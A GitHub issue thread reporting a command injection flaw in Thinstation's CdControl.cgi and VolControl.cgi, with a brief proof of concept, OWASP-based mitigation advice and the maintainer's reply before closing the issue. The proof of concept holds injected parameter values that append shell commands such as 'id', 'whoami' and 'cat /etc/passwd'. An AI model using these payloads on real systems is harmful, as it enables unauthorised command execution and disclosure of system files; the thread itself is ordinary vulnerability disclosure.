Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CGI Generic Command Execution #427

Closed
memN0ps opened this issue Jun 6, 2019 · 5 comments

Comments

Projects
None yet
2 participants
@memN0ps
Copy link

commented Jun 6, 2019

The following resources are vulnerable to arbitrary command execution on Thinstation in /cgi-bin/CdControl.cgi and /cgi-bin/VolControl.cgi.

PoC:
/cgi-bin/CdControl.cgi:

action=;id
eject;ifconfig
back;ls -alt
forward;whoami
pause;hostname

/cgi-bin/VolControl.cgi:

OK=;cat /etc/passwd

Please patch asap. Does affect latest version.

For more information read: https://www.owasp.org/index.php/Command_Injection

@memN0ps memN0ps changed the title CGI Generic Command Execution (Tested on 6.1) Could affect latest version CGI Generic Command Execution Jun 6, 2019

@Thinstation

This comment has been minimized.

Copy link
Owner

commented Jun 6, 2019

You have a recommendation?

@memN0ps

This comment has been minimized.

Copy link
Author

commented Jun 6, 2019

-Avoid calling OS commands directly.
-Validate user input against a whitelist of permitted values.
-For more information, refer to:
https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.md

@Thinstation

This comment has been minimized.

Copy link
Owner

commented Jun 6, 2019

The webserver has very limited system privileges. Common attacks like rt'ing the passwd file can be mitigated by locking the password, and only allowing a single auto-login.

@Thinstation Thinstation closed this Jun 7, 2019

@Thinstation

This comment has been minimized.

Copy link
Owner

commented Jun 17, 2019

Notice to users. Don’t include the www package in your build if your end points might contain sensitive information accessible from an unprivileged user. It’s kind of a No-duh, but now it’s documented.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.